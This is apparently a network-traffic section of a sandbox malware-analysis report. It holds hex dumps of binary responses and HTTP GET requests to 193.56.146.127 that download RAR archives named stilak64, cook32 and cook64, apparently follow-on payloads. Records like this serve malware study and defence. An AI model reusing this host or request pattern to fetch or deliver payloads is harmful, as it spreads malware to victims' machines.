cf 75 4c 90 68 3d c8 15 4b 57 a0 28 a9 e8 a9 5a bd 58 d6 fe 11 ac 7c 5b 97 5f 52 79 45 34 d5 d3 90 9a aa 34 dc 39 d7 ed b3 46 50 5a b0 db 01 20 2d 9e 12 34 15 d3 32 cb 4f 90 5b 4a c5 1c 2e 3d 97 91 b1 38 c8 f5 a7 ed 28 5c 09 b0 d3 db e1 30 d5 56 b3 dc b8 f8 1a c4 b7 29 9f f7 59 ed db a5 af 64 5b 86 f4 36 fd 1a 08 a0 83 6e d4 9a 57 57 ac fc c8 38 2d 9a 03 f5 ad 54 d3 e4 da f7 15 09 6f 6b e8 90 58 1a 6f 4b 55 40 18 d7 03 0b e9 29 8e 2c 61 5f d8 55 a1 3a 89 4b 35 17 49 73 1a 92 67 db a8 b3 36 c3 ce 56 29 08 a7 e7 d3 0d 73 4d 10 39 70 43 43 1f 2b cf bb 4c 25 04 7d 1e e2 ea bc 8a 09 9e a8 93 81 ad 69 dc 56 16 25 1a ad fb ed ec 51 4a fc 77 0a 02 0a 90 bf 88 21 55 f2 2f 1c 99 b1 24 5d c8 ac 64 e0 01 60 38 b0 6d 26 b5 4d c7 6c 4a 2b ea 80 1f 22 5f 29 6a 4b 07 aa 05 53 a8 8f fa 9d c6 e8 57 b5 b4 4e e3 9b 52 fc 3e 81 2b 26 5f 9f e9 05 68 b4 d8 9c e2 56 7a 8e 00 54 d1 15 35 58 8e 90 a1 d7 eb 8f 46 6f cb c2 5a ca 30 06 30 cd 90 51 99 2d b5 bd 61 8f ec 60 0d 01 ed f2 75 d8 a4 f7 de ec 2d bd a9 2f 8e 12 cf 96 eb 6a f8 98 31 e0 f8 3e 0e 74 39 26 20 24 68 55 44 16 ff cc a6 23 59 97 0b a1 f1 b6 fb 89 f4 b5 da c0 7d 75 20 3d d9 49 54 38 10 f6 f9 63 e4 05 36 ae d6 4c 8a 05 c2 fe 1e ac 06 9e db 75 32 37 07 e7 c3 b6 9c 5e 83 ca 53 0e da ee 81 d7 b5 5c a1 87 8f 9a ea d3 7f df f5 37 9b b3 46 27 1c ea 74 d5 a7 21 2a 00 91 e4 f6 c1 f1 39 78 e8 d4 20 ff a2 16 21 ef 38 d7 ef 6e eb b6 fd 7e 80 02 1b 35 d7 b6 9a d5 fe 28 df af 35 62 c9 a8 ce 24 c8 c9 34 fb f3 18 cf c2 52 99 d7 20 aa ee ae 1a 1d 48 34 ba f6 0b 9c bb 6e 6f d1 52 51 9f 3c 7a 40 80 b2 97 e7 a6 21 9b 3c a0 89 2b 0b ff 33 6c 1b cb ae 6b db 09 ea 36 86 d7 c1 c4 69 4a 06 9e 57 c1 72 a1 99 ee 89 16 9c d1 ec b2 ee e7 eb 55 ba 48 4a db 98 e8 cd c4 f5 79 f2 bc 0f 72 89 35 21 b2 31 c0 23 84 8c 5d 69 2e 9f 9b 35 4c ed 3e 88 30 80 23 d1 62 db 8d d7 e2 4f 59 ac d0 70 6e c1 ad 08 ba cd 5b f2 5f 8b 71 36 3e b2 47 87 82 4d 06 99 24 e0 f3 12 1f 12 72 de 4d b3 fc fc d2 56 45 00 15 5f a1 4b 31 f1 d2 df 66 89 a7 78 38 b6 1e c4 2b ae 0f d1 fd c2 70 dd b8 02 87 f1 d1 d4 38 b0 ba 8f 54 20 e9 3a 5e 76 41 0d 2c 2f c6 ea 2b d1 e2 c7 75 28 2b 67 9a fd e3 25 da f6 b2 85 38 17 f2 4f 56 eb 5d 6d 18 31 eb f2 a2 4e bb 02 dd 3f af 48 6c e1 55 9d e5 6f 84 4b 4f 52 78 7c 9f 22 c3 68 57 84 28 a1 b0 04 9c 61 e4 fb 3d 66 28 8a f4 72 d0 56 1d 93 cf 96 bc cb 90 b7 44 dd 0c 60 47 93 14 34 9b 81 13 d0 34 9e 64 ef 32 cc 1b bd fa 2b 54 f3 10 ce b9 5a e2 d6 7c 83 87 e2 39 b2 2a b5
                                                        Data Ascii: E<K]Um9w{o"jju!9QTO]>"T%G5tKb-:Erk S\5(g0M!<T./Mnd:0pk.&JcDNq\EQ&zN>q1WZXYjkK>iQ+HrGx'K_0IgE afUAqH6zduIc/`XuLh=KW(ZX|[_RyE449FPZ -42O[J.=8(\0V)Yd[6nWW8-TokXoKU@),a_U:K5Isg6V)sM9pCC+L%}iV%QJw!U/$]d`8m&MlJ+"_)jKSWNR>+&_hVzT5XFoZ00Q-a`u-/j1>t9& $hUD#Y}u =IT8c6Lu27^S\7F't!*9x !8n~5(5b$4R H4noRQ<z@!<+3lk6iJWrUHJyr5!1#]i.5L>0#bOYpn[_q6>GM$rMVE_K1fx8+p8T :^vA,/+u(+g%8OV]m1N?HlUoKORx|"hW(a=f(rVD`G44d2+TZ|9*
                                                        May 4, 2022 16:21:18.631411076 CEST11246INData Raw: 03 08 ae 27 ee 00 a4 7d f5 2f 19 a4 4d 30 9b f6 b8 8d ef 8c 68 ff a1 9d 02 f1 e5 cf d7 46 5d de c0 a6 c6 5e df 33 22 3f 49 97 52 5c 4f 8a e1 33 f8 cb d5 4b a4 b2 25 2b 47 7e db 0c 4e f1 fa b5 ab 9e ef 92 e3 ea a2 7a 53 3e 44 c2 45 8a 5f 79 74 f0
                                                        Data Ascii: '}/M0hF]^3"?IR\O3K%+G~NzS>DE_yt>~gyd##(ip08Mxr5Qn\`9^a*}(/'v$B6VGJAF)P82l+,lDl|0ue-=$rI5!(&`{41Ck|LCjo.
                                                        May 4, 2022 16:21:18.631433010 CEST11248INData Raw: 83 34 09 e6 db 9e 90 50 b1 5f 60 4e d8 f5 ac f4 00 4c 72 f8 02 bc 23 6d 4f 90 d7 0a d3 38 e4 3d 53 23 ef 3c 05 d1 d0 c4 86 bb 8d b2 e3 08 2a 0b cb df 97 ed 44 96 38 be 85 25 88 76 5c 90 5d e7 bd 11 da d6 8c 81 0d 41 9a 82 f2 53 03 8f 56 35 f1 80
                                                        Data Ascii: 4P_`NLr#mO8=S#<*D8%v\]ASV5KlkjdXgfz_3rr>VJ.%b]Bd@W)_:2/`u@$+001T7JZ'%/PBf\"+ZXf9uD>{I@[M9
                                                        May 4, 2022 16:21:18.631458044 CEST11249INData Raw: 32 09 4a 97 b9 b3 bb ca 66 1e 25 eb 75 07 f5 a6 45 b9 2d 05 30 cb 31 68 aa 14 24 97 02 e4 de d8 dd d7 64 a1 06 8b 7c 85 66 c2 78 ad 0f f3 93 6c ec 7a 74 6f f9 c2 f8 48 cb fc 4d b1 95 e4 96 9f d6 4c f9 32 14 ce 32 66 56 38 01 f0 4c e7 13 f0 7e 3d
                                                        Data Ascii: 2Jf%uE-01h$d|fxlztoHML22fV8L~=+ZR9Zr(p:Pk0jd+z%K,%o~o6#$a`w81G1?_1)E*g_,cp74Fs{AO>
                                                        May 4, 2022 16:21:18.631479979 CEST11250INData Raw: de f8 3d 42 e1 35 e6 36 c1 6e 68 31 a6 92 8a 2a d9 5a 8d f6 7c cb 35 a2 8d 76 95 0a 9b 6a d4 62 ca ca 97 b3 65 be 2c 6a 77 09 5c fd 4d 9f 02 e6 c1 09 f1 84 4d 73 1f 86 52 4c b2 20 93 db b1 aa 6e ef ed a6 0f 7d cd 9c eb d1 fc a3 d7 f3 b5 c2 5f 4e
                                                        Data Ascii: =B56nh1*Z|5vjbe,jw\MMsRL n}_N'D8/-{Y_Hl3H*X9%'@t8.)=0azS*ztjD28(z-xl@=[URa+}Nhe8khg/ouqBhQ;,%
                                                        May 4, 2022 16:21:18.631503105 CEST11252INData Raw: 5b 6c 2e d3 b4 8e e7 06 85 1a 7e 74 d6 92 61 88 5d 59 d9 b9 e9 3f ee a8 c6 9b 30 06 9d 38 d9 74 cf f0 52 a5 d9 d1 cd 57 8f 6a e0 b7 c8 85 a1 52 93 5b c2 ae 60 fb 03 46 98 b3 7b 29 15 ff 29 6f 85 23 c6 f0 95 f7 81 3f b9 6f fc 14 d0 7a 59 42 93 b7
                                                        Data Ascii: [l.~ta]Y?08tRWjR[`F{))o#?ozYBEpEF.M1N;`'$yuB>`.Urn'HGH:v.7E&0CPj$i$#[{M9ZRI8|E4<q=y6
                                                        May 4, 2022 16:21:18.631525993 CEST11253INData Raw: 21 df 0b 07 88 b1 e8 37 a4 f1 f8 39 fa 11 32 b4 f1 9d 0c 29 6e ee ff 3f fc 2d 88 f6 f3 a9 f3 10 bc 63 07 29 ed 31 bd ec 10 0c 82 e8 1f 1f 90 c2 6b f2 92 0f c3 cb 2f cc 76 cb 4c cf f7 42 cb 84 eb 6f 3c e3 e1 a2 5b 71 a9 fe 22 dd e4 d1 c7 9c 80 2d
                                                        Data Ascii: !792)n?-c)1k/vLBo<[q"-~qu*CSc(~/>mcdDT>IhlIj^2Zi\> E[b2>V ct8]68nVE@pxyoJ3(p1K0&t}J(g
                                                        May 4, 2022 16:21:18.631547928 CEST11254INData Raw: 03 7b 36 69 ed ed b5 94 e8 48 bd e2 bd 8a a9 63 74 1c 02 bd b5 36 8e 7b d0 fe f8 82 60 c8 7f 7a 5f ed 49 7a 46 59 7c e9 4b 0e 5f d6 2c 57 90 db 1d 93 21 3e c3 9b ac da 7e b1 0b 4f 97 d4 f9 d1 bc f4 c1 22 18 c0 c0 f2 be 8b a7 d3 1c d1 11 5d b1 5e
                                                        Data Ascii: {6iHct6{`z_IzFY|K_,W!>~O"]^<it>>uG!`xMqvjAuoqUc7AL?XLy&UY>a*(5$TgD'E%~i{MBj'{~(OBkt-m86UY1+"ldj,Q905
                                                        May 4, 2022 16:21:18.631570101 CEST11256INData Raw: 28 dc 46 4f 67 96 4a e9 7e a1 39 a4 80 7d e7 68 5a 9a 0e b9 2f 88 b1 78 5c 30 c6 8f 15 b6 0e 82 d7 d9 df 0c ae 01 d6 25 98 31 a3 86 4a 26 d5 d9 44 a2 f7 07 26 85 23 34 da 39 45 c7 5d 34 6d 74 38 ff 0b 97 f8 8b 70 71 78 19 37 fe cf b9 8d e7 0d 32
                                                        Data Ascii: (FOgJ~9}hZ/x\0%1J&D&#49E]4mt8pqx72X_m]CDk'X[&8s}}/H("@EDskeKNxW>BlV@/'sJ~98r>}vd.v#"Y
                                                        May 4, 2022 16:21:18.631594896 CEST11257INData Raw: 77 74 f9 24 d0 c7 8d 16 4a e3 41 6b 97 26 39 27 6d 4f b0 a0 5a 50 62 f9 69 e4 24 bd 83 b8 33 15 35 01 ad b9 18 04 fb 87 74 fd 3c 01 b7 04 a7 f3 22 86 9e 6c e5 37 bc c5 06 67 a8 da 58 c8 a3 73 10 b8 4e f2 fb 68 e7 44 b1 d1 1e d0 28 6a c5 b9 30 d5
                                                        Data Ascii: wt$JAk&9'mOZPbi$35t<"l7gXsNhD(j0+3YK"\A'Mj8dMiaaF6{MkmqkDK{a|JNa:d*=iCK8<(W`KYvV]u^-[/J$+c yXtY
                                                        May 4, 2022 16:21:18.703301907 CEST11259INData Raw: 27 d1 1b 36 eb 97 d4 c3 eb 1d 57 cc 96 e8 29 e1 81 1a d5 85 3f f3 a5 83 9c 79 fc 8f 60 23 f3 63 97 31 35 f0 e4 62 3f 6a 75 7b dc 44 c1 c4 d0 3d 11 df 38 bb e2 5c b3 de f8 86 c6 5d 79 f8 ec 4f 73 c5 33 5c fe 71 53 c1 a2 5a 15 65 a9 7e 3d 3b 0e 10
                                                        Data Ascii: '6W)?y`#c15b?ju{D=8\]yOs3\qSZe~=;KQEdLZcq<TDl.JsSWhLZ{7.+[ruZFLh&=~r{Y5)qt9<&GD=8CF{o;%{Iy#&
                                                        May 4, 2022 16:21:19.983093977 CEST11604OUTGET /stilak64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:20.052925110 CEST11605INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:20 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 482456
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-75c98"
                                                        Accept-Ranges: bytes
                                                        Data Raw: e5 fa 7e 78 18 d2 fa aa c5 af 39 73 64 ae 32 3f 58 b7 78 e0 83 5a 17 11 c3 94 46 e1 67 28 25 c0 56 b0 8e b3 89 83 f4 bc 22 0d e7 0a d8 e8 c8 63 a3 83 3e d6 30 50 e4 a9 9a 1b 71 35 a6 03 6a 66 77 c3 32 b3 17 1b 8d ce 57 f7 d8 a0 18 ad 5c 55 3a 1a ed 82 23 7a 05 16 38 0f f9 f0 29 40 9e e7 83 8c 88 c6 5e a3 a4 95 6f 47 22 95 d0 67 72 d9 9c 24 0c 6e b1 f0 3f 4b f6 52 44 2a 1a 76 be 5b 9a 2b d9 ca 42 6c f4 ed 16 d3 3f ec 46 20 1f 69 de 27 d7 c5 6f 3b 47 5a c3 0b 96 a9 98 fa 58 ac 6c ea b4 b7 36 35 3a 8a a0 f5 d3 98 52 5b 8a 13 4c 80 a3 20 19 f4 a7 de 96 80 a8 16 b7 6b a0 d4 7a 1e 01 0c b3 30 a8 e4 00 e6 75 7c b5 d4 20 a1 5a 63 a2 be f2 7d d2 dc ca 58 28 3a 1b 7d 0d 9c 18 5d 09 e7 cc 47 1e 58 36 56 04 ed a4 0f bd dc c9 36 52 13 2f 3f 87 85 99 c7 7c 30 43 a2 1d 68 ed 50 28 cf 39 bd 1f 09 c3 c3 f3 f8 17 7d da 0e 24 10 f7 48 90 cf e0 69 1a dd ad 3b 05 4e 60 77 b6 88 86 96 09 3e c2 8b 7c 16 15 cf ef 97 87 48 77 3e 4e d7 2d ab 99 1c 0b b9 6f 1f 42 43 bd f5 18 7f de 21 d9 e3 48 aa 53 db e7 b9 e3 6b 68 61 ba ce d1 57 81 b9 38 ae 7c 26 1a 75 2c 8b 75 f9 76 22 07 4d 54 8e 48 ba 50 e1 57 da 02 94 fc be 0e 32 1e 74 69 35 ac 2a 9f e9 3b 08 62 8c f8 5c d6 90 09 f9 2e 09 57 42 2b 16 09 58 22 a3 2c 6d 1f ea 3d 30 89 c0 b7 d1 ce de 73 7f 37 ed 0c 99 8b e2 32 40 d1 f5 56 19 ae 42 96 bb 30 d1 b6 c4 b2 41 a0 9a 04 6b 89 70 99 ae 4a 53 59 9b a0 72 c8 3d 5c 41 6b 23 51 da 55 d8 00 36 6c 5d 76 29 44 f8 6e 10 8c 09 d1 6c 57 fa 5e a8 ad 52 b3 1b d3 fd d9 20 c1 48 a8 77 fc 66 9c 4e 47 2f 03 1f e8 f8 7e d0 88 fb 00 4e 9d 7a 6c 5b 79 24 c5 6d 45 b7 e5 a9 3c 4e 21 ce 32 91 f0 37 af 1a 52 75 0e 9b 76 2a a4 bb 1b 73 62 8c 91 58 03 96 92 6c 0a 53 22 d9 a3 c3 b8 39 59 c3 05 b8 a3 ce 52 db 5b 8c e9 e6 89 b1 b9 fe 68 46 f4 42 9d 67 5a 0c af 7c a0 67 03 10 95 56 48 15 4d 4f 45 7c 22 d7 fd e4 5a d5 b3 c9 b7 6f 4c 11 28 0d 48 1b 59 81 4e 7a b9 75 55 c2 f2 4b a8 be b6 ce 92 44 78 3c 92 d2 e2 3e a3 10 fd e6 70 f3 90 d4 fd 68 bc 32 e5 f8 40 15 6a e0 81 48 d5 12 fa 81 87 cd 26 00 fb cb 0a 40 dc 19 93 b6 ef 14 f4 cf 7b 7d d0 26 e4 22 f3 cb c8 2d 86 57 ea ce f4 11 17 86 21 84 63 78 4c 73 22 38 7f 7b 00 b7 1e eb 44 a5 dc c8 64 6b d5 30 33 88 fe d0 9a 80 4b c3 20 b4 ff 0a 93 21 aa 2b 3f b1 e0 6d c5 d1 e1 a3 de 9e 57 39 c6 ae a0 f2 7d bb b3 7e 9a 89 27 c1 61 3c 35 b0 05 a8 9e 3d ed 6b c6 bd 7f d0 49 31 11 41 03 7a 90 08 6d d5 4b ce 53 7c 99 f9 97 39 0c 4f aa ae af f8 d2 2b b7 4a 40 44 7b e7 73 7b 82 fc 96 63 4f eb e5 d1 b8 54 43 af 66 12 64 31 6e a7 09 3a da 76 64 85 31 79 7e 7a c2 ce 63 1a 49 44 0a b7 91 93 6a de a3 78 f6 7d fe 5c 80 da 20 c9 63 db 06 cd 1d 50 25 cc 5c 20 3a b9 8b f2 ff c4 15 fd a5 a0 e7 63 e8 80 ec 98 d8 e5 da 11 6e 51 12 60 1e 36 a9 a6 14 1b 31 11 fe d0 fa 9f d7 4c 96 b8 60 df 61 c3 ac 86 08 15 56 be fd 91 64 0d 01 2d 9f 21 1c ec ee 82 3f e8 20 93 ef bf d9 be 77 ef 6d 34 99 96 3f 1c 86 df 7e da 56 22 35 61 dc a9 f6 ab 19 dc 96 8b 72 37 d3 ea ec 15 cf b8 39 f9 59 80 31 05 4e 88 bc cb b3 7f f6 c1 ee 0c 33 c7 00 1d b7 1e c0 52 f5 b7 24 88 fc f0 8d 3d 88 e3 12 38 01 1a 66 9b 4b 15 cc 7b ce 47 68 7b 76 84 03 de 88 9a a7 13 a5 56 7c ff f9 52 bb 6b 8b 91 c6 15 c0 9b 0d b2 cf a5 2f 68 1e db 02 4e c0 d3 e7 a0 d9 54 d1 df 7e 96 03 1e 16 59 f6 57 3b 42 11 1c 7f 7e a3 3d 1d b8 08 a2 78 50 1a 3c 6c 97 17 a1 b5 47
                                                        Data Ascii: ~x9sd2?XxZFg(%V"c>0Pq5jfw2W\U:#z8)@^oG"gr$n?KRD*v[+Bl?F i'o;GZXl65:R[L kz0u| Zc}X(:}]GX6V6R/?|0ChP(9}$Hi;N`w>|Hw>N-oBC!HSkhaW8|&u,uv"MTHPW2ti5*;b\.WB+X",m=0s72@VB0AkpJSYr=\Ak#QU6l]v)DnlW^R HwfNG/~Nzl[y$mE<N!27Ruv*sbXlS"9YR[hFBgZ|gVHMOE|"ZoL(HYNzuUKDx<>ph2@jH&@{}&"-W!cxLs"8{Ddk03K !+?mW9}~'a<5=kI1AzmKS|9O+J@D{s{cOTCfd1n:vd1y~zcIDjx}\ cP%\ :cnQ`61L`aVd-!? wm4?~V"5ar79Y1N3R$=8fK{Gh{vV|Rk/hNT~YW;B~=xP<lG
                                                        May 4, 2022 16:21:20.986284018 CEST12097OUTGET /cook32.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.056226969 CEST12098INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 340630
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-53296"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 6d 89 b6 ca 2a ed 42 3d 7d 47 d0 53 23 32 6f 53 6a 18 43 e5 c9 c2 0c 08 3c 98 eb e5 5a fa 10 6b 57 26 bc 9b f0 a5 12 7a 6c 04 9f 5a 67 bf da 73 38 dc 4f f9 57 6f 44 87 6a 61 4c 28 46 19 8a 17 c0 a1 29 d4 cb d9 7f df 5b 7c 63 f5 13 a1 14 71 6d 42 2e b2 f5 59 29 7c 87 a1 85 d4 1c 9b 3f ef a8 f6 e4 e5 fd 9c 77 6b 20 0a ef 83 e2 4b 0a 08 c3 2a d3 f8 29 c9 6f c3 69 e9 5d 3e 42 1c c2 51 2c b5 2a 1c 83 56 42 6e 66 c9 a9 37 88 6e c8 92 7c 71 34 5e d0 9a 79 dd f4 a2 c9 6c c3 09 ee fb a8 1b 7c 8a 32 22 e3 f7 3d 56 be e1 1b 69 76 c3 79 f0 46 77 7a a8 11 e3 c7 c0 53 1b 6b 6a 48 d1 85 31 39 dc fe 06 d6 e9 74 64 06 24 8a d0 8e 4b ff f4 e0 cf 12 83 f0 05 39 35 bb e3 f8 83 a9 dc bd ea da f6 e9 5f 80 4f 7a c4 55 e5 29 3e 8d d9 ac 0f 26 10 c0 c7 5f d6 e8 5f 6c 78 c7 e2 1e 1e d9 1c 3b bc 29 52 3c b6 c1 c3 b2 01 02 6a 02 c6 95 a6 72 ff df 84 59 a0 a0 db e2 e6 61 6b ba 2a 7d ee 05 0b 52 ad e3 1d 87 e3 c9 17 0a 40 aa f1 94 02 d5 33 eb d7 c3 f0 67 c4 1c 20 0d 95 ce 30 f5 d2 87 8d 40 8a ce 79 ed d6 bb 66 a3 f5 1c 4d 0a f7 5a 18 80 ed f6 bf 80 65 ba e9 43 dd 51 e1 b6 2c ca bd 55 f4 95 f9 92 ac 90 09 e9 f4 09 f5 39 a4 0e 4b f1 a5 83 6a 47 bb b6 4c 36 2a 21 5d e6 d8 72 78 53 fb d9 f7 f2 8d 9e 11 cb d0 8f 4a 21 bc 88 58 fe c1 f0 90 99 df 71 6b 54 3f f5 df d7 1f ad 34 ca c0 05 38 eb 6b 0e d7 a7 9b 5c dc d4 7e 5b 0a 34 fa a2 0e 99 8a e5 8d 14 fb d7 b1 7a 9e 07 60 aa 1b 77 b1 d0 f9 ab 5b f3 85 9c a1 4d be 42 b4 ae c2 71 be a8 9a 56 92 9d ea b6 58 bc 12 97 42 7b 22 d2 2c cf 6d a5 89 e2 82 96 94 dd 13 7b 7b 6d 9a c9 09 92 7d 64 83 ca 77 f7 cb 2f 1b b9 09 85 20 63 ca d9 45 9c 9c c7 0d 83 7b ff 7f ac 43 db 3f bd 63 b6 22 fd 6e 33 e3 6c 4b ae ad ae cc 87 37 65 d5 32 68 2e 23 95 b8 bc c8 86 48 48 3d 72 d7 a7 da 5d 2d 7f 47 a5 6a f6 ad a7 ff 84 58 75 92 9a 9d a4 dd d2 f5 ad df ad 48 fb bd 27 0e 25 49 5e 64 16 b6 0e 73 f9 e4 17 d2 5b 6d c8 22 d8 43 48 56 15 fb 9c 42 56 39 a3 70 64 c8 33 f6 e4 9f 56 0d ad ab 1d d6 13 6b 29 72 9a 9f 67 d1 09 d8 8d a9 f1 da 83 11 71 c6 36 f6 0f fd 15 ea 7d c2 b9 7c 50 0a 64 57 df 84 23 16 33 a9 63 44 2c cd 9f 91 91 48 62 6f 01 de a9 79 f9 9f e5 da c2 2f 3d 3d 8d f3 15 90 5e 40 97 b7 89 80 7c e7 b8 25 3b e5 fd c3 59 b8 96 6f 1b f5 f1 a8 e7 93 9a f3 2e 1b 20 f5 81 30 04 e7 1f b1 c1 26 0a 66 9e 5a 26 8a 84 87 62 19 40 91 4b 09 f5 b6 6e dd 85 e3 0c c3 8d 5c 81 1c 75 ff cd 82 f6 f9 19 9b b7 89 84 7f 7e 93 48 e8 dd 3f 78 6e 56 16 76 fb 0c 99 76 d6 ab a5 59 c5 f8 69 60 1c 39 69 a2 30 2b 2d 13 2e 87 9f 15 80 a5 95 d0 d5 74 62 e0 7e 5b e2 31 9a 26 55 f7 26 85 94 f7 52 17 b5 b4 48 bd 3d d9 41 ae 57 4b fc d6 18 61 b6 bf 00 46 21 bf 78 9c bf 34 f9 82 ea 25 00 a1 1d f6 6c 13 14 e9 e7 c8 43 e0 34 cb 4c 95 b5 74 cc d4 24 c4 46 51 f5 86 70 d2 f9 54 8b 6d 76 cf f6 78 76 c0 f8 e8 bf dc 50 7a a6 3b e2 c8 5c 13 da bb fc d7 c4 a4 7d ec 16 79 f1 e7 b8 91 93 a6 8f e9 71 24 2d 4a 35 34 c5 60 83 1b 33 af 4f 95 07 b7 e8 27 92 89 62 82 70 1f ac da f6 38 c8 6f d7 2d da 85 e7 6b 98 21 b8 ba fe 3c ed a9 10 6f 75 e0 75 35 b9 41 a8 d5 98 c5 64 ff 05 c0 67 c2 99 d2 5d 5a 36 a2 8c 3f 4d 85 8c 88 c5 d3 2f 07 7d 8d 0e d5 35 3b 0a a3 ba e6 c9 f3 45 c3 d1 20 d1 d0 70 9c 38 4d 7d 5f 8d 5a 3c 5c be c4 8d 0b 94 a2 61 ec 32 78 8a 7d c2 ec d9 af 05 02 38 d6 ed f3 9c ee 02 c6 6a 90 1b 1a 76 57 73 d7 ed a5 1f ee 98 96 63
                                                        Data Ascii: m*B=}GS#2oSjC<ZkW&zlZgs8OWoDjaL(F)[|cqmB.Y)|?wk K*)oi]>BQ,*VBnf7n|q4^yl|2"=VivyFwzSkjH19td$K95_OzU)>&__lx;)R<jrYak*}R@3g 0@yfMZeCQ,U9KjGL6*!]rxSJ!XqkT?48k\~[4z`w[MBqVXB{",m{{m}dw/ cE{C?c"n3lK7e2h.#HH=r]-GjXuH'%I^ds[m"CHVBV9pd3Vk)rgq6}|PdW#3cD,Hboy/==^@|%;Yo. 0&fZ&b@Kn\u~H?xnVvvYi`9i0+-.tb~[1&U&RH=AWKaF!x4%lC4Lt$FQpTmvxvPz;\}yq$-J54`3O'bp8o-k!<ouu5Adg]Z6?M/}5;E p8M}_Z<\a2x}8jvWsc
                                                        May 4, 2022 16:21:21.354583979 CEST12447OUTGET /cook64.rar HTTP/1.1
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
                                                        Host: 193.56.146.127
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        May 4, 2022 16:21:21.424647093 CEST12448INHTTP/1.1 200 OK
                                                        Server: nginx/1.14.2
                                                        Date: Wed, 04 May 2022 14:21:21 GMT
                                                        Content-Type: application/x-rar-compressed
                                                        Content-Length: 476828
                                                        Last-Modified: Tue, 25 Jan 2022 14:33:43 GMT
                                                        Connection: keep-alive
                                                        ETag: "61f00a47-7469c"
                                                        Accept-Ranges: bytes
                                                        Data Raw: 5d 8b 8b 70 09 0e 1d d9 90 dd ab 7b 33 6a c0 52 31 a0 b6 04 f6 3f 2c 2e c3 a2 b0 07 ab 38 fc 74 ed fa 59 e1 54 59 8e 5a d4 67 4d 48 cf 9f 04 d9 44 fe 6c 57 29 99 30 f7 01 d0 36 58 0f ca d2 73 70 1b f2 92 c3 7c b0 3e 78 94 57 f4 4b 39 77 05 b8 ed 02 5e 12 4d a6 e1 05 bd f8 f7 d0 d3 a9 57 55 34 57 87 40 e8 b9 6e f0 ed b3 db 4d d9 05 e2 95 5c 9f 02 48 e3 34 67 c4 9b c0 1d c1 c5 bb 24 97 c6 50 01 fa 49 39 fe 75 1f 0a cd 7a 85 7c 3e 16 e7 e0 9d 81 48 fc dd e7 f1 c9 40 7f d9 9b a3 0d 47 7e 92 cb bf b8 20 da cd 79 0a 4d 36 0d b3 c3 07 69 6d f6 b1 f7 16 08 4d 9d 4d 3f 64 80 88 78 d5 5e 87 99 18 f7 12 21 85 7b eb e6 e1 da 00 0b 9e 5a 71 f7 a8 d7 1a 90 73 9e f2 5c 58 fe c7 3b d3 50 e2 f5 6a 2c 9d 8e 92 29 e1 cd 48 ef 98 a1 fb b3 f8 a2 4e b0 b5 38 26 8d 53 db a2 fc ce 6d 68 10 e7 2f e5 f9 85 ed 30 21 92 ff 70 02 7e 81 35 20 c0 ef ca c1 26 c7 af 71 43 ee ae 83 a2 48 a2 80 67 06 47 4f cf 11 52 22 6c 92 7d d5 97 98 fc 3a 05 f7 bd 2a 25 56 2a 75 75 71 a8 d9 03 23 39 d2 9d e4 98 16 0c 8c db b9 7a 07 7c 0a 6d ff 9b 86 a2 66 05 12 59 42 0d 1c 4c 41 17 ef 22 93 8b 8f b4 16 ea a7 65 a2 f2 86 50 8e 7f 69 86 be 4c a4 a9 59 1c 9b f3 9f 0b 9c 10 6e b5 22 b7 ae 7b b1 fe 1c 95 d6 9c a1 09 44 dc 9c f4 f1 4c de 51 5d 68 07 c9 c4 5d ff 0c e1 b6 0c 22 f4 4b bd 4c 90 32 b0 ba 85 9f 26 76 c8 98 ea 24 ea 9b e4 b8 a6 7c bf a3 36 76 9d e4 10 f7 ba 31 a7 43 fa f1 62 26 3d 4c 8a 9a 05 4f 31 c1 45 8d 82 49 7e f1 5b aa 01 0e 36 1c 0b 54 ae 27 c3 5c cf eb d9 3d 13 11 c3 33 c7 63 79 1d aa 1c f7 d5 73 58 da 62 fd c5 2e e1 2f a0 4a f5 15 c6 7d 26 3d 43 80 c9 3c 2d 7f 2e df 94 f4 e4 95 7a e6 92 36 e2 eb 6c c6 08 80 4f 5c 8d 79 5f 59 ac b1 a8 ef 57 99 26 e7 a7 c0 52 18 16 02 ad 0c ca ef c6 74 5a f0 04 33 a3 ea 81 15 32 78 f5 39 db 07 45 f6 b7 f4 d8 76 44 f7 d9 70 ab 52 38 48 6d d9 74 d0 2b a1 02 00 72 9d 11 b6 31 88 95 31 42 48 0e 6a 29 df f0 9b 9a 66 a0 68 bc e2 0d b6 70 a0 15 a7 9b cc 07 b6 9c e4 e5 e5 21 8e 3c 9b 89 9b 15 63 98 47 50 c0 47 eb 3d f9 48 20 db b4 1f 17 e2 6a 16 4a 1b 35 06 f4 1a cc 7a 68 f8 92 dd d7 a1 0b 72 9b 63 7d b3 a3 e5 04 d5 3a f1 15 8f e0 28 7f 17 89 c7 ad 50 62 02 dd 90 74 f4 7a 95 9c 54 cc e6 8f e6 3b 81 d1 eb 80 de 9b b8 d3 2f 23 e3 f4 5c 16 9c 16 32 bd d4 53 7b b8 53 37 2c 83 21 c6 91 69 06 67 e8 55 85 41 ec 02 90 9a be 15 0d 85 18 50 dc cf 14 a8 c7 e1 bf 67 da 8a 41 15 9d 84 1d 65 56 97 db 7e 39 d3 0e 82 a4 32 48 5f d9 30 ef 1b 7e e4 fa b9 c2 c6 b0 d9 7d f4 6f 1c 4d 31 6b a6 9a b9 5e be 6e 9b 66 8f a3 52 6d ce dd 26 f8 1d bf 